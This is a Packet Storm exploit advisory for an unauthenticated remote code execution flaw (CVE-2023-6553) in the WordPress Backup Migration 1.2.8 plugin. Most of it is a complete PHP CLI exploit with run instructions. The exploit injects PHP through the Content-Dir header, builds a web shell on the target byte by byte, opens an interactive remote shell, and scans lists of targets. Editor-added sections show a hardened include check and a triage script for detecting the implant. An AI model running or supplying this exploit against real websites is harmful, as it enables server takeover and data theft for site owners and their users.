PACKETSTORM:211997

WordPress Backup Migration 1.2.8 Remote Code Execution

9.8 / 10 CRITICAL
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Description

WordPress Backup Migration plugin version 1.2.8 proof of concept code injection exploit for an older vulnerability from 2023...

Basic Information

ID PACKETSTORM:211997
Published Nov 25, 2025 at 00:00

Affected Product

WordPress Backup Migration (backup-backup) plugin, version 1.2.8

=============================================================================================================================================
| # Title : WordPress Backup Migration 1.2.8 PHP Code Injection |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) |
| # Vendor : https://wordpress.org/plugins/backup-backup/ |
=============================================================================================================================================

POC :

1. Vulnerability Overview
-------------------------
A critical Remote Code Execution vulnerability (CVE-2023-6553) exists in the
WordPress plugin "Backup Migration" (backup-backup), see also
https://packetstorm.news/files/id/207962/, allowing arbitrary PHP code
execution via an unsafe header parameter inside:

/wp-content/plugins/backup-backup/includes/backup-heart.php

backup-heart.php can be requested directly, without WordPress being
bootstrapped, and takes the value of the HTTP header "Content-Dir" as the
directory from which it require_once()s its own include files. The header is
therefore an attacker-controlled include path: pointed at a php://filter
chain that decodes to attacker-supplied PHP, the include executes that PHP,
and the executed PHP can then write files into the plugin directory. This
allows an attacker to:

• Write arbitrary PHP files
• Overwrite internal plugin files
• Deploy a persistent web shell
• Achieve full remote command execution

No authentication is required.
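As an added illustration (editor's example, not the plugin's verbatim source and not part of this PoC), the include-path pattern behind CVE-2023-6553 in simplified form, next to a hardened resolver. The function names, the constructed Content-Dir values and the temporary plugin directory are the editor's assumptions; it runs offline with the PHP CLI and needs no WordPress install.

```php
<?php
// Added editor's example, not the plugin's verbatim code and not part of the
// PoC: the include-path pattern behind CVE-2023-6553, simplified, next to a
// hardened resolver. Function names and constructed inputs are the editor's.

// VULNERABLE PATTERN (simplified): the directory the script includes from is
// taken from the Content-Dir request header. Whatever string a caller puts
// there becomes the prefix of a require_once path, so a stream wrapper such
// as php://filter/... or a directory the attacker can write to is accepted.
function resolveIncludesUnsafe(array $server, string $pluginDir): string
{
    $root = $server['HTTP_CONTENT_DIR'] ?? $pluginDir;
    return $root . '/includes';
}

// HARDENED: the plugin knows where it lives, so the include directory never
// comes from request data. If an override has to be supported, reject URL
// schemes, resolve it with realpath(), and require that it stays inside the
// plugin directory; anything else falls back to the fixed path.
function resolveIncludesSafe(array $server, string $pluginDir): string
{
    $fixed = rtrim($pluginDir, '/') . '/includes';
    $override = $server['HTTP_CONTENT_DIR'] ?? null;
    if ($override === null || $override === '') {
        return $fixed;
    }
    // php://, data://, phar://, http:// ... are never a plugin directory.
    if (preg_match('#^[a-z][a-z0-9+.-]*://#i', $override)) {
        return $fixed;
    }
    $real = realpath($override);
    $base = realpath($pluginDir);
    if ($real === false || $base === false) {
        return $fixed;
    }
    if ($real !== $base && strpos($real, $base . DIRECTORY_SEPARATOR) !== 0) {
        return $fixed; // resolves outside the plugin directory
    }
    return $real . '/includes';
}

// Offline demonstration with constructed $_SERVER values (no network needed).
$pluginDir = sys_get_temp_dir() . '/backup-backup-demo';
@mkdir($pluginDir . '/includes', 0700, true);
$cases = [
    'no header'     => [],
    'filter chain'  => ['HTTP_CONTENT_DIR' => 'php://filter/convert.base64-decode/resource=php://temp'],
    'foreign dir'   => ['HTTP_CONTENT_DIR' => sys_get_temp_dir()],
    'traversal'     => ['HTTP_CONTENT_DIR' => $pluginDir . '/includes/../..'],
    'inside plugin' => ['HTTP_CONTENT_DIR' => $pluginDir . '/includes/..'],
];
foreach ($cases as $name => $server) {
    printf("%-14s unsafe: %s\n%-14s safe:   %s\n", $name,
        resolveIncludesUnsafe($server, $pluginDir), '',
        resolveIncludesSafe($server, $pluginDir));
}
```

The unsafe resolver hands every constructed value straight to the include prefix, including the php://filter one; the hardened resolver returns the fixed path for all of them except the value that resolves to the plugin directory itself. The real lesson is the first branch: a plugin entry point has no reason to read a filesystem path from a request header at all, and the scheme/realpath checks only matter if such an override cannot be removed.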

====================================================================

2. PHP Exploit Description
--------------------------
This exploit is a PHP CLI conversion of the original Python version.
It performs:

• Vulnerability verification (writes and reads back a one-byte staging file)
• Payload file creation
• Arbitrary file write, one byte per request, each byte as a hex escape
• Deployment of an interactive remote shell
• Cleanup of the temporary shell

The implant stage uses only fopen/fwrite/copy/unlink, so it works even when
PHP's command-execution functions are disabled. The deployed shell itself
runs commands through the backtick operator (shell_exec), so command output
requires shell_exec to be enabled on the target.

====================================================================

3. Usage Instructions (CLI Mode)
--------------------------------

Save the file as:

exploit.php

Then run from terminal:

php exploit.php -u https://target.com

Options:
-u <url> Test and exploit a single target
-c Check only (no shell deployment; the check still writes and removes a one-byte staging file on the target)
-f <file> Scan a list of targets (one per line)
-t <n> Number of concurrent workers (default 5; accepted, but this port scans targets sequentially)
-o <file> Save vulnerable hosts to output file
--help Show help

Examples:

• Check vulnerability only:
php exploit.php -u https://site.com -c

• Exploit and open interactive shell:
php exploit.php -u https://site.com

• Scan targets list:
php exploit.php -f targets.txt -o vulnerable.txt

====================================================================

4. Saving The PHP Code (Important)
----------------------------------
1. Copy the PHP exploit code into a file named:

exploit.php

2. Make sure PHP CLI is installed:
php -v

3. Give execution permission (Linux only, useful if you add a "#!/usr/bin/env php" first line):
chmod +x exploit.php

4. Run the exploit:
php exploit.php -u https://victim.com

====================================================================

5. How The Exploit Works
------------------------
Step 1: Send a PHP payload to backup-heart.php in the "Content-Dir" header
Step 2: The payload writes a one-byte staging file inside includes/; the
        check fetches that file back and compares its content
Step 3: Exploit appends the final shell to the staging file one byte per
        request, each byte sent as a hex escape (\x3c), which avoids any
        quoting problems in the header
Step 4: Staging file copied to a randomly named .php in the plugin
        directory, then unlinked
Step 5: Interactive command execution via GET requests to that .php file

The exploit shell uses GET parameter "?0=" to wrap command output with:

[S] output [E]

This allows clean extraction and parsing.

Caveat: send_payload() places the PHP source verbatim in the Content-Dir
header. Because backup-heart.php uses that value as an include path, the
public exploitation technique delivers the payload as a php://filter chain
that decodes to the PHP source; this port does not generate such a chain.
Confirm payload delivery against a real 1.2.8 install before treating a
"not vulnerable" result from -c as conclusive, and remember that even the
check creates a file on the target.
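For the defensive side of the same steps, an added triage check (editor's example, not part of the PoC) that looks for the artifacts Steps 2 to 4 leave in includes/: the one-letter staging file, the three-character random .php, the [S]/[E] markers and the backtick on a request parameter. It builds a constructed copy of the directory under the system temp folder, and the known-good file list is a stand-in for the real plugin manifest; both are the editor's assumptions. Runs offline with the PHP CLI.

```php
<?php
// Added editor's example, not part of the original PoC: offline triage of a
// backup-backup/includes/ directory for the files this exploit leaves behind.
// The directory contents and the known-good list below are constructed
// stand-ins; against a real install, compare with the upstream release files.

// Flags files that are not in the known-good list and annotates them with the
// exploit's specific traits: a single-uppercase-letter staging file, a
// three-character random .php name, the [S]/[E] output markers, and a
// backtick (shell_exec) on a request parameter.
function triageIncludesDir(string $dir, array $knownGood): array
{
    $findings = [];
    foreach (scandir($dir) as $name) {
        $path = $dir . '/' . $name;
        if ($name === '.' || $name === '..' || !is_file($path)) {
            continue;
        }
        $reasons = [];
        if (!in_array($name, $knownGood, true)) {
            $reasons[] = 'not in known-good file list';
        }
        if (preg_match('/^[A-Z]$/', $name)) {
            $reasons[] = 'single-letter staging file name';
        }
        if (preg_match('/^[A-Za-z0-9]{3}\.php$/', $name)) {
            $reasons[] = 'three-character random .php name';
        }
        $head = (string) file_get_contents($path, false, null, 0, 4096);
        if (strpos($head, '[S]') !== false && strpos($head, '[E]') !== false) {
            $reasons[] = 'contains [S]/[E] output markers';
        }
        if (preg_match('/`[^`]*\$_(GET|POST|REQUEST)\b/', $head)) {
            $reasons[] = 'backtick shell_exec on a request parameter';
        }
        if ($reasons !== []) {
            $findings[$name] = ['mtime' => filemtime($path), 'reasons' => $reasons];
        }
    }
    ksort($findings);
    return $findings;
}

// Constructed directory: two stand-ins for legitimate plugin files, plus the
// staging file and the shell exactly as the PoC writes them.
$dir = sys_get_temp_dir() . '/bmi-triage-demo/includes';
@mkdir($dir, 0700, true);
file_put_contents("$dir/backup-heart.php", "<?php // stand-in for the plugin entry point\n");
file_put_contents("$dir/bypasser.php",     "<?php // stand-in for a plugin include\n");
file_put_contents("$dir/Q",                'Q');
file_put_contents("$dir/k7Z.php",          '<?php echo "[S]";echo `$_GET[0]`;echo "[E]";?>');

$knownGood = ['backup-heart.php', 'bypasser.php'];
foreach (triageIncludesDir($dir, $knownGood) as $name => $finding) {
    printf("%-10s modified %s\n", $name, date('c', $finding['mtime']));
    foreach ($finding['reasons'] as $reason) {
        echo "  - $reason\n";
    }
}
```

The name patterns and markers are the narrowest signal and are trivially changed by anyone editing the PoC; the comparison against a known-good file list and the modification times are what carry over to other implants, and the staging file may already be gone because the exploit unlinks it after the copy.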

====================================================================

6. Full PHP Exploit Code
------------------------
<?php
/**
* CVE-2023-6553 Exploit – PHP CLI Version
* by Indoushka
*/

error_reporting(E_ALL);
ini_set('display_errors', 1);

class CVE_2023_6553 {
    public $base_url;
    public $temp_file_name;   // staging file created inside includes/ on the target
    public $random_file_name; // final web shell name: three random chars + .php

    public function __construct($base_url) {
        $this->base_url = rtrim($base_url, '/');
        $this->temp_file_name = chr(rand(65,90)); // single random uppercase letter
        $this->random_file_name = substr(str_shuffle("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"),0,3) . ".php";
    }

    // Delivers one payload to backup-heart.php in the Content-Dir header.
    // Returns true when the HTTP request completed; that says nothing about
    // whether the target executed the payload, which check_vulnerability()
    // verifies by reading the staging file back.
    public function send_payload($payload) {
        $url = $this->base_url . "/wp-content/plugins/backup-backup/includes/backup-heart.php";
        $ch = curl_init($url);
        curl_setopt_array($ch, [
            CURLOPT_RETURNTRANSFER => true,
            CURLOPT_HTTPHEADER => ["Content-Dir: $payload"],
            CURLOPT_TIMEOUT => 10,
            CURLOPT_POST => true,
            CURLOPT_SSL_VERIFYPEER => false,
            CURLOPT_SSL_VERIFYHOST => false
        ]);
        $res = curl_exec($ch);
        $err = curl_errno($ch);
        curl_close($ch);
        return ($err===0);
    }

    // Writes a one-byte staging file via the payload and reads it back over
    // HTTP. A match proves the header value was executed as PHP. The staging
    // file is removed afterwards so a check-only run leaves nothing behind.
    public function check_vulnerability() {
        $random_char = chr(rand(65,90));
        $payload = "<?php fwrite(fopen('{$this->temp_file_name}','w'),'{$random_char}');?>";
        $this->send_payload($payload);

        $url = $this->base_url . "/wp-content/plugins/backup-backup/includes/{$this->temp_file_name}";
        $ch = curl_init($url);
        curl_setopt_array($ch, [
            CURLOPT_RETURNTRANSFER => true,
            CURLOPT_TIMEOUT => 10,
            CURLOPT_SSL_VERIFYPEER => false,
            CURLOPT_SSL_VERIFYHOST => false
        ]);
        $res = curl_exec($ch);
        curl_close($ch);

        $vulnerable = (trim((string)$res) === $random_char);
        if($vulnerable) {
            echo "[+] {$this->base_url} is vulnerable to CVE-2023-6553\n";
            $this->send_payload("<?php unlink('{$this->temp_file_name}');?>");
        }
        return $vulnerable;
    }

    // Builds the shell on the target one byte per request. Each byte goes out
    // as a "\xNN" escape inside a PHP double-quoted string, so no character of
    // the shell source has to survive the header unescaped. The finished
    // staging file is then copied to its final .php name and unlinked.
    public function write_string_to_file($string_to_write) {
        $init = "<?php fwrite(fopen('{$this->temp_file_name}','w'),'');?>";
        if(!$this->send_payload($init)){
            echo "Failed to initialise staging file\n";
            return false;
        }

        $len = strlen($string_to_write);
        for($i=0;$i<$len;$i++){
            $hex = bin2hex($string_to_write[$i]);
            $cmd = "<?php fwrite(fopen('{$this->temp_file_name}','a'),\"\\x{$hex}\");?>";
            if(!$this->send_payload($cmd)){
                echo "Failed at character {$i}: {$string_to_write[$i]}\n";
                return false;
            }
        }

        $copy = "<?php copy('{$this->temp_file_name}','{$this->random_file_name}');?>";
        $this->send_payload($copy);
        $delete = "<?php unlink('{$this->temp_file_name}');?>";
        $this->send_payload($delete);
        return true;
    }

    // Runs one command through the deployed shell and extracts the output
    // from between the [S] and [E] markers.
    public function retrieve_command_output($command) {
        $url = $this->base_url . "/wp-content/plugins/backup-backup/includes/{$this->random_file_name}?0=" . urlencode($command);
        $ch = curl_init($url);
        curl_setopt_array($ch, [
            CURLOPT_RETURNTRANSFER => true,
            CURLOPT_TIMEOUT => 10,
            CURLOPT_SSL_VERIFYPEER => false,
            CURLOPT_SSL_VERIFYHOST => false
        ]);
        $res = curl_exec($ch);
        curl_close($ch);
        if(preg_match("/\\[S\\](.*?)\\[E\\]/s",(string)$res,$m)) return $m[1];
        return "No output or functions disabled.";
    }

    // Simple read-eval loop over HTTP. Ends on "exit" or when stdin closes.
    public function interactive_shell() {
        echo "[+] Entering interactive shell (type 'exit' to quit)\n";
        while(true){
            echo "# ";
            $line = fgets(STDIN);
            if($line === false) break; // stdin closed
            $cmd = trim($line);
            if($cmd === "exit") break;
            if($cmd === "") continue;
            echo $this->retrieve_command_output($cmd) . "\n";
        }
    }
}

// ---------------- CLI Handler -----------------
$options = getopt("u:f:t:o:c", ["help"]);
$url = $options['u'] ?? null;
$file = $options['f'] ?? null;
$threads = intval($options['t'] ?? 5); // accepted for compatibility; this port scans sequentially
$output = $options['o'] ?? null;
$check_only = isset($options['c']);
$usage = "Usage: php exploit.php -u <url> [-c] | -f <file> [-t threads] [-o output] | --help\n";

if(isset($options['help'])){
    echo $usage;
} elseif($url){
    $exploit = new CVE_2023_6553($url);
    if($exploit->check_vulnerability()){
        if(!$check_only){
            $shell_code = '<?php echo "[S]";echo `$_GET[0]`;echo "[E]";?>';
            if($exploit->write_string_to_file($shell_code)){
                echo "[+] Shell deployed successfully!\n";
                $exploit->interactive_shell();
                echo "[!] Deleting shell...\n";
                $exploit->send_payload("<?php unlink('{$exploit->random_file_name}');?>");
            }
        }
    } else {
        echo "[!] {$url} is not vulnerable.\n";
    }
} elseif($file){
    $urls = file($file, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);
    if($urls === false){
        fwrite(STDERR, "[!] Cannot read target list {$file}\n");
        exit(1);
    }
    foreach($urls as $u){
        $exploit = new CVE_2023_6553($u);
        // Check once per host: every call writes a fresh staging file on the target.
        $vulnerable = $exploit->check_vulnerability();
        if(!$vulnerable) echo "[-] {$u} is not vulnerable.\n";
        if($output && $vulnerable){
            file_put_contents($output,$u.PHP_EOL,FILE_APPEND);
        }
    }
} else {
    echo $usage;
}
?>


Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================
